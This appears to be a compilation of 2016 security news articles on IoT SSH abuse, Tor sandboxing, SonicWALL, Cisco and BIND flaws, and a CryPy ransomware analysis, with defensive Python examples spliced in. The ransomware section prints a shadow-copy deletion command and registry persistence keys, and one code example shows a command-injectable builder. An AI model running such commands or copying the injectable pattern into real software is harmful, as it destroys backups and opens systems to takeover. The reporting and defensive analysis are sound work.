The hackers then turn these devices, which the researchers call the "Internet of Unpatchable Things", into proxies for malicious traffic aimed at internet-facing targets and services, as well as at the internal networks that host the devices.
Unlike the recent Mirai botnet attacks, the new attack, dubbed SSHowDowN Proxy, specifically makes use of IoT devices such as:
Internet-connected Network Attached Storage (NAS) devices.
CCTV, NVR, DVR devices (video surveillance).
Satellite antenna equipment.
Networking devices like routers, hotspots, WiMax, cable and ADSL modems.
Other devices could be susceptible as well.
More importantly, the SSHowDowN Proxy attack exploits a more than decade-old default configuration flaw (CVE-2004-1653) in OpenSSH that was initially discovered in 2004 and patched in early 2005. The flaw enables TCP forwarding and port bounces when the device is used as a proxy.
However, after analyzing IP addresses from its Cloud Security Intelligence platform, Akamai estimates that over 2 Million IoT and networking devices have been compromised by SSHowDowN type attacks.
Due to lax credential security, hackers can compromise IoT devices and then use them to mount attacks "against a multitude of Internet targets and Internet-facing services, like HTTP, SMTP and network scanning," and to mount attacks against internal networks that host these connected devices.
Once hackers access the web administration console of vulnerable devices, it is possible for them to compromise the device's data and, in some cases, fully take over the affected machine.
While the flaw itself is not so critical, the company says the continual failure of vendors to secure IoT devices, as well as their use of default and hard-coded credentials, has left the door wide open for hackers to exploit them.
"We are entering a very interesting time when it comes to DDoS and other web attacks; 'The Internet of Unpatchable Things' so to speak," said Eric Kobrin, senior director of Akamai's Threat Research team.
"New devices are being shipped from the factory not only with this vulnerability exposed but also without any effective way to fix it. We've been hearing for years that it was theoretically possible for IoT devices to attack. That, unfortunately, has now become the reality."
According to the company, at least 11 of Akamai's customers in industries such as financial services, retail, hospitality, and gaming have been targets of SSHowDowN Proxy attack.
The company is "currently working with the most prevalent device vendors on a proposed plan of mitigation."
How to Mitigate Such Attacks?
So, if you own a connected coffee machine, thermostat or any IoT device, you can protect yourself by changing the factory default credentials of your device as soon as you activate it, as well as disabling SSH services on the device if it is not required.
More technical users can establish inbound firewall rules that prevent SSH access to and from external sources.
Meanwhile, vendors of internet-connected devices are recommended to:
Avoid shipping such products with undocumented accounts.
Force their customers to change the factory default credentials after device installation.
Restrict TCP forwarding.
Allow users to update the SSH configuration to mitigate such flaws.
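The vendor recommendations above boil down to a handful of sshd_config settings. The script below is an added example (not Akamai's code, and not tied to any specific device): it parses a constructed weak configuration of the kind a device might ship with, a hardened version of the same file, and reports which settings allow TCP forwarding, gateway ports, tunnelling, root login, password login or empty passwords. The defaults it assumes for absent keywords are the older OpenSSH ones (AllowTcpForwarding yes, PermitRootLogin yes, which was the default before OpenSSH 7.0), since long-unpatched devices are the ones at issue; Match blocks are not modelled.

```python
"""Audit an sshd_config for the settings the SSHowDowN mitigations target (added example)."""
import re

# Constructed sample: the kind of configuration a device might ship with.
WEAK_CONFIG = """\
Port 22
Protocol 2
PermitRootLogin yes
PasswordAuthentication yes
PermitEmptyPasswords yes
# AllowTcpForwarding is not set, so the OpenSSH default ('yes') applies
GatewayPorts yes
"""

# The same file with the vendor recommendations above applied.
HARDENED_CONFIG = """\
Port 22
Protocol 2
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
PermitEmptyPasswords no
AllowTcpForwarding no
GatewayPorts no
PermitTunnel no
X11Forwarding no
"""

# (keyword, value assumed when the keyword is absent, values that pass the audit)
# Assumed defaults are the older OpenSSH ones; PermitRootLogin defaulted to 'yes' before 7.0.
RULES = [
    ("AllowTcpForwarding", "yes", {"no", "local"}),
    ("GatewayPorts", "no", {"no"}),
    ("PermitTunnel", "no", {"no"}),
    ("PermitRootLogin", "yes", {"no", "prohibit-password", "without-password"}),
    ("PasswordAuthentication", "yes", {"no"}),
    ("PermitEmptyPasswords", "no", {"no"}),
]

KEYWORD_RE = re.compile(r"^(\w+)\s*=?\s*(\S.*?)\s*$")


def parse_sshd_config(text):
    """Map each keyword (lower-cased) to its first value; sshd honours the first
    occurrence of a keyword. Match blocks are not modelled: all lines count as global."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = KEYWORD_RE.match(line)
        if m:
            settings.setdefault(m.group(1).lower(), m.group(2))
    return settings


def audit(text):
    """Return (keyword, effective_value, origin) for every rule the config violates.
    origin is 'explicit' or 'default', so the reader can tell whether the dangerous
    setting was written down or merely inherited from the daemon's defaults."""
    settings = parse_sshd_config(text)
    findings = []
    for keyword, default, acceptable in RULES:
        if keyword.lower() in settings:
            value, origin = settings[keyword.lower()], "explicit"
        else:
            value, origin = default, "default"
        if value.lower() not in acceptable:
            findings.append((keyword, value, origin))
    return findings


if __name__ == "__main__":
    for finding in audit(WEAK_CONFIG):
        print("weak:", finding)
    print("hardened:", audit(HARDENED_CONFIG))
```

The point of the `origin` field is the SSHowDowN lesson itself: the weak configuration never mentions AllowTcpForwarding, yet the device forwards TCP because the keyword's default does.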
Since the number of IoT devices is now in the tens of billions, it’s time to protect these devices before hackers cause a disastrous situation.
Non-profit organizations like MITRE have come forward to help protect IoT devices by challenging researchers to come up with new, non-traditional approaches for detecting rogue IoT devices on a network. The organization is also offering up to $50,000 in prize money.

Here’s how Tor Project and Mozilla will make harder de-anonymizing Tor users

14.10.2016 securityaffairs Security

Tor Project and Mozilla are working together to improve the security of Tor users and make it harder for attackers to unmask them.
Intelligence and law enforcement agencies continue to invest in order to de-anonymize Tor users. In the past, we received news about several techniques devised by various agencies to track Tor users, from the correlation attacks to the hack of a machine with the NIT script.

In many cases, authorities and cyber spies targeted individual users’ computers. For this reason, the experts at the Tor Project, together with the Mozilla Firefox experts involved in the project, are working on a series of improvements to make it harder to exploit flaws in the browser component of the Tor architecture.

The improvements aim to block malware from trying to gather information to unmask users.

Tor Project

“We’re at the stage right now where we have created the basic tools and we’re working on putting them together to realize the security benefits,” Richard Barnes, Firefox Security Lead, told Joseph Cox from Motherboard via email.

The Tor Browser is composed of two components: a modified version of the Firefox browser, and the Tor proxy, which implements the routing functionality of the Tor network. An attacker can try to hack the browser component and force it to connect to something other than the legitimate Tor proxy, for example a server set up by the attacker to gather user data.

“That means if an attacker can compromise the Firefox half of Tor Browser, it can de-anonymize the user by connecting to something other than the Tor proxy,” Barnes said.

Barnes described a series of improvements, including the use of Unix domain sockets, which are communication endpoints for exchanging data between processes running on the same operating system.

This will allow the Tor proxy to communicate securely with the Firefox component without relying on the underlying network protocol. In this way the experts can sandbox the Firefox component: any manipulation or attack will have no effect on the user’s privacy, because the browser wouldn’t be able to make a network connection to de-anonymize the user.

Basically, the intent of the experts at the Tor Project is to sandbox the Tor Browser to insulate users from attacks such as the NIT and similar ones. According to Motherboard, the Tor developer Yawning Angel has just finished an experimental prototype that will likely appear in some versions of the Tor Browser later this year.

“That means that you could run it in a sandbox with no network access (only a Unix domain socket to the proxy), and it would still work fine. And then, even if the Firefox half of Tor Browser were compromised, it wouldn’t be able to make a network connection to de-anonymize the user,” added Barnes.

As explained by Barnes, this kind of security measure is currently supported only on platforms that implement Unix domain sockets, such as Linux and Mac OS.

The experts are now working to extend it to Windows platforms.
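The exchange Barnes describes, a browser half that reaches the proxy half only through a Unix domain socket, is shown below as an added example that is not Tor Project or Mozilla code. The "proxy" and "browser" are stand-in functions running in one process; the socket path, the request bytes and the reply format are all constructed for the demonstration.

```python
"""Browser-to-proxy exchange over a Unix domain socket (added example, not Tor Project or Mozilla code)."""
import os
import socket
import tempfile
import threading


def run_proxy(sock_path, ready):
    """Stand-in for the Tor proxy half: it listens on a filesystem path, not on a TCP port."""
    with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as server:
        server.bind(sock_path)
        server.listen(1)
        ready.set()
        conn, _ = server.accept()
        with conn:
            request = conn.recv(4096)
            # A real proxy would relay the request into the Tor network; the stand-in
            # just acknowledges it so both directions of the exchange are visible.
            conn.sendall(b"PROXY-OK " + request)


def browser_fetch(sock_path, request):
    """Stand-in for the sandboxed Firefox half: its only I/O path is the Unix socket."""
    with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as client:
        client.connect(sock_path)
        client.sendall(request)
        return client.recv(4096)


def demo():
    """Run both halves and return the reply the browser side received."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "tor.sock")  # constructed socket path
        ready = threading.Event()
        proxy = threading.Thread(target=run_proxy, args=(path, ready))
        proxy.start()
        ready.wait()
        reply = browser_fetch(path, b"CONNECT example.onion:443")
        proxy.join()
        return reply


if __name__ == "__main__":
    print(demo())
```

The sandbox itself is not in this code: denying the browser process any AF_INET or AF_INET6 socket is the job of the operating system (a seccomp filter or a separate network namespace on Linux, for instance). The Unix socket is simply the one channel such a policy leaves open, which is why a compromised browser half confined this way cannot reach out directly.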

SonicWALL Email Security appliance flaws could expose corporate emails
14.10.2016 securityaffairs Vulnerebility

Dell issued the SonicWALL Email Security OS 8.3.2 release to address high severity issues that can be exploited to take control of the appliance.
Security researchers at Digital Defense discovered multiple vulnerabilities while assessing the SonicWALL Email Security virtual appliance. According to the experts, the flaws could be exploited by attackers to conduct a wide range of malicious activities, including command injection, arbitrary file deletion, denial-of-service (DoS) and information disclosure.

Below is the list of vulnerabilities discovered by the Digital Defense, Inc. Vulnerability Research Team (VRT).

DDI-VRT-2016-69: Authentication Bypass in DLoadReportsServlet (High)

The attacker can access backup files that include also the SHA-1 hash of the administrator account password.

“The DLoadReportsServlet can be accessed via the http://<IP>/dload_reports URL without authentication. If any backups have been made via the web interface and the Email Security appliance is set as the storage location, they can be downloaded by supplying the path to the backup via the “snapshot” GET parameter which can be used to access any files stored in the backup directory or one of its sub-directories. ” reads the analysis published by the experts.

DDI-VRT-2016-70: Authenticated XML External Entity Injection in known_network_data_import.html (High)

The experts discovered that it is possible to launch an XML External Entity (XXE) injection attack to steal sensitive data.

DDI-VRT-2016-71: Authenticated Remote Command Execution in manage_ftpprofile.html (High)

This issue could be exploited by an attacker to send backup files to a remote FTP server.

“The SonicWALL Email Security appliance has an option to send backup files to a remote FTP server instead of storing them locally on the appliance. To use this functionality, the user would need to create an FTP profile which includes the FTP server address, port, username, password, and destination path. No sanitation is done on the user provided values for the username or password before they are saved for later use. Commands placed inside backticks or semicolons can be injected via the username or password parameters.” states the analysis published by Digital Defense.

DDI-VRT-2016-72: Authenticated Arbitrary File Deletion in policy_dictionary.html (High)

The flaw allows attackers to delete arbitrary files with root privileges and trigger DoS conditions.
The researchers discovered that a bug in the way compliance dictionaries are managed via web interface allows authenticated attackers to select any files and delete them.

“When a dictionary is selected for deletion the “save” method is called. This method first verifies that the dictionary selected for deletion is not in use before deleting the dictionary file from disk. The “save” method does not validate that the “selectedDictionary” POST parameter contains a valid dictionary before deleting the file. This allows an authenticated user to delete any files from the host that is running the SonicWALL Email Security software.” states the advisory.
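Two of the advisories quoted above come down to unvalidated input reaching the operating system: FTP profile fields spliced into a command (DDI-VRT-2016-71) and a "selectedDictionary" parameter used as a file path (DDI-VRT-2016-72). The following is an added example, not Dell's or Digital Defense's code, showing the vulnerable shape of the first beside a hardened version, and a path-resolution check for the second. The use of curl as the upload tool, the field names, and the /var/app/dicts directory are assumptions for the illustration.

```python
"""Hardening the two input paths the advisories describe (added example, not the vendor's code)."""
import os
import re

HOSTNAME_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")
USERNAME_RE = re.compile(r"^[A-Za-z0-9._@-]{1,64}$")
CONTROL_RE = re.compile(r"[\x00-\x1f\x7f]")
DICT_NAME_RE = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9._-]*$")


def build_upload_command_unsafe(profile, backup_file):
    """The vulnerable shape: profile fields spliced into a shell command string.
    Returned only for inspection, never executed: a username in backticks or a
    password containing ';' would run as a command if this string reached a shell."""
    return ('curl -u "{username}:{password}" -T {backup} "ftp://{host}:{port}/{path}"'
            .format(backup=backup_file, **profile))


def validate_ftp_profile(profile):
    """Return a list of field names that fail validation; empty means acceptable."""
    problems = []
    if not HOSTNAME_RE.match(str(profile.get("host", ""))):
        problems.append("host")
    if not (isinstance(profile.get("port"), int) and 1 <= profile["port"] <= 65535):
        problems.append("port")
    if not USERNAME_RE.match(str(profile.get("username", ""))):
        problems.append("username")
    password = str(profile.get("password", ""))
    # Passwords may legitimately contain shell metacharacters; only control bytes are rejected,
    # because the hardened builder never hands the value to a shell in the first place.
    if not password or CONTROL_RE.search(password):
        problems.append("password")
    path = str(profile.get("path", ""))
    if path.startswith("/") or ".." in path.split("/"):
        problems.append("path")
    return problems


def build_upload_argv(profile, backup_file):
    """The safe shape: validate, then build an argv list for subprocess.run(argv)
    with the default shell=False, so every field is passed to curl as literal data."""
    problems = validate_ftp_profile(profile)
    if problems:
        raise ValueError("invalid FTP profile fields: " + ", ".join(problems))
    return ["curl", "--user", f'{profile["username"]}:{profile["password"]}',
            "-T", backup_file,
            f'ftp://{profile["host"]}:{profile["port"]}/{profile["path"]}']


def resolve_dictionary(base_dir, selected):
    """Map a selectedDictionary value to a file directly inside base_dir, or None.
    The allow-list rejects path separators and leading dots; realpath then catches
    an existing symlink that would point outside the directory."""
    if not DICT_NAME_RE.match(selected):
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, selected))
    if os.path.dirname(target) != base:
        return None
    return target
```

Note that `resolve_dictionary` only answers "is this a file the user may name"; the advisory's other check, that the dictionary is not in use, still has to run before anything is deleted.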


The researchers explained that the flawed SonicWALL Email Security virtual appliance may be configured for external access, which means that remote attackers can take complete control of it by combining the authentication bypass and command execution flaws.

The full control over the SonicWALL Email Security virtual appliance could be exploited to capture inbound and outbound emails of the organization.

Dell has patched the issues with the new SonicWALL Email Security OS 8.3.2 release.

Cisco Meeting Server – CVE-2016-6445 flaw allows to impersonate legitimate users
14.10.2016 securityaffairs Vulnerebility

Cisco fixed a critical vulnerability in the Cisco Meeting Server, tracked as CVE-2016-6445, that allows remote attackers to impersonate legitimate users.
A security vulnerability in Cisco Meeting Server, tracked as CVE-2016-6445, could be exploited by attackers to impersonate legitimate users.
Experts from Cisco uncovered the vulnerability during a routine security audit of a customer.

The hole resides in the Extensible Messaging and Presence Protocol (XMPP) service of the Cisco Meeting Server (CMS). According to Cisco, the XMPP service incorrectly processes a deprecated authentication scheme allowing an unauthenticated attacker to access the system impersonating another user.

“A vulnerability in the Extensible Messaging and Presence Protocol (XMPP) service of the Cisco Meeting Server (CMS) could allow an unauthenticated, remote attacker to masquerade as a legitimate user.” reads the security advisory published by CISCO. “This vulnerability is due to the XMPP service incorrectly processing a deprecated authentication scheme. A successful exploit could allow an attacker to access the system as another user.”


The CVE-2016-6445 flaw affects the following versions of the Cisco Meeting Server:

Cisco Meeting Server prior to 2.0.6 with XMPP enabled.
Acano Server prior to 1.8.18 and prior to 1.9.6 with XMPP enabled.
Cisco urges its customers to apply the appropriate updates; as a workaround, it suggests disabling the XMPP protocol with the “xmpp disable” command.

According to the company, there is no evidence that the CVE-2016-6445 has been exploited in the wild.

This is the second advisory published by Cisco for Meeting Server, a first one was published in July and it was related to a persistent cross-site scripting (XSS) flaw that allowed an unauthenticated attacker to execute arbitrary code in the context of the product’s management interface.

“A vulnerability in the web bridge that offers video via a web interface of Cisco Meeting Server Software, formerly Acano Conferencing Server, could allow an unauthenticated, remote attacker to conduct a persistent cross-site scripting (XSS) attack against a user of the web interface of an affected system.” stated the Cisco Advisory.
“The vulnerability is due to improper input validation of certain parameters that are passed to an affected device via an HTTP request. An attacker could exploit this vulnerability by persuading a user to follow a malicious link.”

Back to the CVE-2016-6445 flaw, the firmware updates can be downloaded from the CISCO Software Center (Products > Conferencing > Video Conferencing > Multiparty Conferencing > Meeting Server > Meeting Server 1000 > TelePresence Software).

Acano software can be downloaded from the Acano website.

Attackers are exploiting a recently patched high-severity DoS flaw in BIND
13.10.2016 securityaffairs Attack

Attackers are exploiting a recently patched high-severity DoS flaw, tracked as CVE-2016-2776, in the popular BIND DNS software.
Last month a vulnerability in the popular DNS software BIND, tracked as CVE-2016-2776, was patched. The flaw could be exploited by a remote attacker to trigger a DoS condition using specially crafted DNS packets. The high-severity flaw, initially discovered by the Internet Systems Consortium (ISC), was fixed with the release of BIND 9.9.9-P3, 9.10.4-P3 and 9.11.0rc3.

“Testing by ISC has uncovered a critical error condition which can occur when a nameserver is constructing a response. A defect in the rendering of messages into packets can cause named to exit with an assertion failure in buffer.c while constructing a response to a query that meets certain criteria.” reported the alert issued by the ISC.

“This assertion can be triggered even if the apparent source address isn’t allowed to make queries (i.e. doesn’t match ‘allow-query’).”

The flaw resides in the way the DNS server constructs a response to certain queries: when the response is larger than the default 512 bytes, the BIND name server process crashes, triggering the DoS condition.

According to the Internet Systems Consortium (ISC), after the public disclosure of the proof-of-concept (PoC) code and a Metasploit module by the Infobyte firm, threat actors in the wild exploited it to cause server crashes.


The news was confirmed by Japan’s National Police Agency, which issued a security alert titled “BIND Vulnerability (CVE-2016-2776) for the observation of indiscriminate attack activities” to warn users of ongoing attacks.

“Designated as CVE-2016-2776, this particular vulnerability can be triggered when a DNS server constructs a response to a crafted query where the response size crosses the default DNS response size 512. ISC has fixed two vulnerable functions dns_message_renderbegin () and dns_message_rendersection() to address this vulnerability.” states the analysis published by TrendMicro.

“Before patching, the server does not take fixed 12-byte DNS headers into consideration, which also adds to the response traffic after rendering the Resource Records from Query through function dns_message_rendersection(). So if the DNS response(r.length) traffic is less than 512 bytes (msg->reserved), the function will return true, but adding the fixed 12-byte header will cause the service to terminate if it exceeds the fixed reserved size of 512 bytes.”

Experts at Infobyte believe that the use of the msg->reserved variable could introduce other vulnerabilities like the CVE-2016-2776.

“Publishing a fix about a lethal bug where you would have to patch the whole internet, doesn’t leave a lot of time to find elegant solutions. So if you review the fix it’s possible that a new similar bug appears in dns_message_renderbegin(). while the use of msg->reserved is quite limited. It continues being a complex software. Meanwhile msg->reserved is still being used, the existence of a bug like CVE-2016-2776 is quite probable.” states the blog post from InfoByte.
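The TrendMicro description above, a size check that forgets the fixed 12-byte DNS header, is easy to model. The block below is an added example, a deliberately simplified model and not BIND's code: it fills a fixed 512-byte buffer that already holds the header, first with a check that counts only rendered resource-record bytes and then with one that counts the header too, and reports whether the response was correctly truncated or ran past the reserved space (the situation that, in BIND, ended in the buffer.c assertion). The `<=` comparison and the uniform RR lengths are assumptions of the model.

```python
"""Model of the response-size check behind CVE-2016-2776 (added example; simplified, not BIND's code)."""
DNS_HEADER_LEN = 12       # id, flags, qdcount, ancount, nscount, arcount: 2 bytes each
DEFAULT_RESERVED = 512    # the reserved response size the text refers to


def fits_before_fix(rr_bytes_so_far, next_rr_len, reserved=DEFAULT_RESERVED):
    """Pre-fix check as described: only the rendered RR bytes are compared with
    the reserved size; the fixed 12-byte header is left out of the sum."""
    return rr_bytes_so_far + next_rr_len <= reserved


def fits_after_fix(rr_bytes_so_far, next_rr_len, reserved=DEFAULT_RESERVED):
    """Post-fix check: the header is part of the message and counts against the limit."""
    return DNS_HEADER_LEN + rr_bytes_so_far + next_rr_len <= reserved


def render_response(rr_lengths, fits, buffer_size=DEFAULT_RESERVED):
    """Render RRs into a fixed buffer that already holds the header.
    Returns (bytes_used, truncated, overflowed). 'truncated' is the correct outcome
    (set the TC bit and stop); 'overflowed' stands in for the assertion that makes
    named exit when a write goes past the reserved space."""
    used = DNS_HEADER_LEN
    rr_bytes = 0
    for length in rr_lengths:
        if not fits(rr_bytes, length):
            return used, True, False
        rr_bytes += length
        used += length
        if used > buffer_size:
            return used, False, True
    return used, False, False


if __name__ == "__main__":
    # Constructed response: five 100-byte records plus one 10-byte record (510 bytes of RRs).
    answer = [100] * 5 + [10]
    print("before fix:", render_response(answer, fits_before_fix))
    print("after fix: ", render_response(answer, fits_after_fix))
```

With 510 bytes of records the pre-fix check is satisfied (510 is within 512) even though 12 + 510 bytes are about to be written, which is exactly the gap the quoted analysis points at; the post-fix check stops at the sixth record and the message is truncated instead.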

Classified U.S. Defense Network Outage Hits Air Force’s Secret Drone Operations
13.10.2016 thehackernews Safety
U.S. drones are again in the news for killing innocent people.
The Air Force is investigating the connection between the failure of its classified network, dubbed SIPRNet, at Creech Air Force Base and a series of high-profile airstrikes that went terribly wrong in September this year.
Creech Air Force Base is a secret facility outside Las Vegas, where military and Air Force pilots sitting in dark and air-conditioned rooms, 7100 miles from Syria and Afghanistan, remotely control their "targeted killing" drone campaign in a video-game-style warfare.
From this ground zero, Air Force pilots fire missiles on targeted areas half a world away just by triggering a joystick, and also operate drones for surveillance and intelligence gathering.
The drone operation facility at Creech Air Force Base, a key base for worldwide drone and targeted killing operations, has been assigned ‘Special Access Programs’ status to access SIPRNet.
What is SIPRnet?
SIPRNet, or Secret Internet Protocol Router Network, is a global United States military Internet system used for transmitting classified information, intelligence, targets, and messages at the secret level.
In other words, SIPRNet is a completely parallel Internet that uses the same communications procedures but is kept separate from the ordinary civilian Internet.
Approximately 3 Million people with secret clearances have access to SIPRNet, which includes Pentagon and military officials, Intelligence agencies, FBI, as well as diplomats in US embassies all around the World.
Classified Network Crashed at Creech Base
The network at Creech Air Force Base crashed in early September, impacting "critical services," and has not been completely rebuilt, according to US government contracting records.
"On 9 September 2016, the SIPRNet system currently in operation at Creech AFB failed, and critical services were impacted," reads a contracting notice posted by the US government in early October.
"The services were somewhat restored with the use of multiple less powerful devices. This temporary solution stabilized the services, but will not be able to maintain the demand for very long. If this solution fails, there is currently no other backup system."
The officials would not say whether the failure was due to internal technical faults, a cyber attack, or a state-sponsored hacker. They would also not say if JWICS — a separate internet system that handles top-secret information — at Creech was also affected.
US Drones Killed around 100 Innocents within Two Weeks
Within weeks of the computer disaster, a series of airstrikes went terribly wrong, which resulted in scores of deaths in Syria, Afghanistan, and Somalia, according to BuzzFeed News.
On September 17, 62 Syrian soldiers were accidentally killed by US airstrikes in the middle of a ceasefire. On September 28, 15 innocent civilians were reportedly killed in Afghanistan by a US drone, as well as 22 Somali soldiers were reportedly killed in Somalia by US drone strikes.
All the cases are under review and investigation, and there has been no official explanation for targeting innocent people, though the United States expressed its regrets quickly after the incident, according to reports.
On October 7, the Air Force quietly announced that Creech base would be subject to a surprise cyber security inspection and warned personnel to be wary of phishing attacks and to be extra careful in securing their login credentials.
Has U.S. Classified Network Been Hacked?
These classified networks are definitely not connected to the Internet, but this does not mean that malware or well-resourced hackers can never find their way into these critical networks.
If confirmed, this would not be the first time a classified computer network of the US military has been compromised.
In the year 2008, The Pentagon acknowledged a significant cyber attack, Operation Buckshot Yankee, where a foreign intelligence agent used a USB drive to infect military computers used by the Central Command in overseeing combat zones in Iraq and Afghanistan with a specially crafted malware.
You might be aware of Chelsea Manning (then known as Bradley Manning), an army soldier who made headlines in 2013 when she was sentenced to 35 years in prison for leaking over 700,000 classified files to WikiLeaks.
Manning allegedly downloaded those secret documents from SIPRNet using a Lady Gaga CD.
Since these classified networks have a significant role in US national security, terrorist groups and state-sponsored hackers belonging to sophisticated nation-states like China, Russia, Iran, and North Korea have always shown large interest in targeting them.

CryPy: ransomware behind Israeli lines
13.10.2016 Kaspersky Virus
A Tweet posted recently by AVG researcher, Jakub Kroustek, suggested that a new ransomware, written entirely in Python, had been found in the wild, joining the emerging trend for Pysomwares such as the latest HolyCrypt, Fs0ciety Locker and others.

This Python executable comprises two main files. One is called boot_common.py and the other encryptor.py. The first is responsible for error-logging on Windows platforms, while the second, the encryptor, is the actual locker. Within the encryptor are a number of functions including two calls to the C&C server. The C&C is hidden behind a compromised web server located in Israel. The Israeli server was compromised using a known vulnerability in a content management system called Magento, which allowed the threat actors to upload a PHP shell script as well as additional files that assist them in streaming data from the ransomware to the C&C and back.

A notable point to mention is that the server was also used for phishing attacks, and contained PayPal phishing pages. There are strong indications that a Hebrew-speaking threat actor was behind these phishing attacks. The stolen PayPal credentials were forwarded to another remote server located in Mexico, which was compromised with the same arbitrary file upload technique, only against a different content management system.

It is a known practice for attackers to look for low-hanging fruit into which they can inject their code in order to hide their C&C server. One such example was the CTB-Locker for web servers reported last March.

Ransomware Analysis
SHA1: ad046bfa111a493619ca404909ef82cb0107f012
MD5: 8bd7cd1eee4594ad4886ac3f1a05273b
Size: 5.22 MB
Type: exe

To reverse the executable one should first conduct a number of checks using a convenient debugger. The universal steps for unpacking an unknown packer start with trying to set a memory breakpoint on popular functions that packers use, such as VirtualAlloc.

If the breakpoint hits, the next step involves switching to user mode and setting a hardware breakpoint (on access). That will assist in inspecting where exactly the program initializes the memory block. In most cases, an executable magic header (MZ) should appear in the memory block. However, in this case the following screenshot shows the readable data that was allocated to that memory block:


After the data was allocated to the memory block, the program appeared to be executing VM code (Python bytecode for the Python VM). For those who are not familiar with the term, VM code is an instruction set defined by the author of the virtual machine rather than by the hardware; the virtual machine interprets those instructions on top of the real CPU.

py2exe simply converts the code to x86 assembly, the architecture used on the CPU, and, by loading the Python DLL, loads all the modules into memory.

We found that the executable file was generated using py2exe. The first indicator was a stack PUSH instruction to add the string – PY2EXE_VERBOSE: a module that compiles Python scripts to Microsoft Windows executables.


PY2EXE module string disclosure

A module that reverses the operation of py2exe can be found on GitHub and is called unpy2exe. This module reverts the executable back to its original compiled Python code (i.e. a .pyc file). From that format, another step is required to fully revert to the original source code. We randomly chose to use EasyPythonDecompiler.


Fully decompiled Python scripts

In its current state, the executable fails to encrypt the file system, simply because the threat actors must have migrated from the current server to another. By doing so, they deleted the remaining traces of the PHP files they used for data collection from a victim’s machine. The following is the log file that is generated upon exception:


Error log file being generated by the boot_common.py

The scripts in Python use two files:

Name: boot_common.py
md5: dfd6237e26babdbc2b32fa0d625c2d16
SHA1: 38fe7b64113e467375202e2708199b45a22b25a6
Size: 3Kb
This file throws an “error” to show that the program failed to execute if there is a problem.
Name: encryptor.py
md5: 1ed3f127a0e94394ef049965bbc952ef
SHA1: 73122712b4563fadcc9871eb3fe0efdcf70bb608
Size: 9Kb
This script encrypts the victim’s files.
The ransomware disables the following features on the compromised machine:
By overwriting the registry policies it disables Registry Tools, Task Manager, CMD and Run.


list of registry manipulations

It then continues by running bcdedit to disable recovery and ignore the boot status policy.

The ransomware targets files with the following extensions:
*.mid, *.wma, *.flv, *.mkv, *.mov, *.avi, *.asf, *.mpeg, *.vob, *.mpg, *.wmv, *.fla, *.swf, *.wav, *.qcow2, *.vdi, *.vmdk, *.vmx, *.gpg, *.aes, *.ARC, *.PAQ, *.tar.bz2, *.tbk, *.bak, *.tar, *.tgz, *.rar, *.zip, *.djv, *.djvu, *.svg, *.bmp, *.png, *.gif, *.raw, *.cgm, *.jpeg, *.jpg, *.tif, *.tiff, *.NEF, *.psd, *.cmd, *.class, *.jar, *.java, *.asp, *.brd, *.sch, *.dch, *.dip, *.vbs, *.asm, *.pas, *.cpp, *.php, *.ldf, *.mdf, *.ibd, *.MYI, *.MYD, *.frm, *.odb, *.dbf, *.mdb, *.sql, *.SQLITEDB, *.SQLITE3, *.asc, *.lay6, *.lay, *.ms11 (Security copy), *.sldm, *.sldx, *.ppsm, *.ppsx, *.ppam, *.docb, *.mml, *.sxm, *.otg, *.odg, *.uop, *.potx, *.potm, *.pptx, *.pptm, *.std, *.sxd, *.pot, *.pps, *.sti, *.sxi, *.otp, *.odp, *.wks, *.xltx, *.xltm, *.xlsx, *.xlsm, *.xlsb, *.slk, *.xlw, *.xlt, *.xlm, *.xlc, *.dif, *.stc, *.sxc, *.ots, *.ods, *.hwp, *.dotm, *.dotx, *.docm, *.docx, *.DOT, *.max, *.xml, *.txt, *.CSV, *.uot, *.RTF, *.pdf, *.XLS, *.PPT, *.stw, *.sxw, *.ott, *.odt, *.DOC, *.pem, *.csr, *.crt, *.key and wallet.dat to encrypt crypto currency wallets

The files under the following paths are encrypted using AES in CBC mode:

[userhome]\\My Documents\\
[userhome]\\My Music\\
[userhome]\\My Pictures\\
[userhome]\\My Videos\\
*userhome - The current user home directory

When the encryption step is done, the ransomware will remove the restore points and write the README_FOR_DECRYPT.txt file and execute it. The following screen shot is the ransom note:


CryPy Ransomware Note embedded in the Python code

The threat actor behind the attack asks the victim to contact it via email, and to send a request to the following two email addresses to receive the decryption program:

(1) m4n14k@sigaint[.]org
(2) blackone@sigaint[.]org

Note that the ransom note contains mistakes, implying that it was written by a non-English speaker. First, the headline is missing a ‘T’ in “IMPORTAN INFORMATION”. Second, the sentence “Decrypting of your files…” is syntactically wrong. Native speakers will be able to find additional mistakes.

The threat actor claims that files will be deleted every 6 hours, which reflects the approach of more advanced ransomwares. However, it forgets to mention proof of decryption or a channel that can be used in cases where the payment process is not responsive. This points to the executable being at an early stage of development.

The ransomware survives a reboot by adding the following keys to the registry:

regkey Software\\Microsoft\\Windows\\CurrentVersion\\Run
subkey Adobe_ReaderX
data %TEMP%\\mw.exe
regkey Software\\Microsoft\\Windows\\CurrentVersion\\Run
subkey explore_
data [userhome]\\Appdata\\local\\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.exe
The code for adding the values to the registry is located in the functions autorun() and autorun2().




These keys cause the computer to execute the files after the computer is restarted.

Right before launching the ransom note, the script calls a delete_shadow() function that takes no arguments, and simply executes the following command line code to remove all shadow copies and prevent recovery from backup:

os.system("vssadmin Delete shadows /all /Quiet")

Lastly, the file calls the autorun2() function, which copies the ransomware from its current location to C:\\Users\\\\AppData\\Local under a hardcoded name.
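The two Run-key entries described above share traits a defender can look for: an executable launched from %TEMP%, an executable dropped directly in AppData\Local rather than in a product folder, and a GUID-looking file name. The following is an added example, not Kaspersky's code, that scores Run-key values against those traits. The sample value list is constructed (a benign entry plus the two entries the page lists); on Windows the optional reader pulls the real HKCU Run values with winreg, elsewhere it returns nothing so the triage can still be exercised.

```python
"""Triage Run-key autostart entries for the traits of the persistence described above (added example)."""
import re
import sys

# Constructed sample: one ordinary entry plus the two entries the page describes.
SAMPLE_RUN_VALUES = [
    ("OneDrive", r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"),
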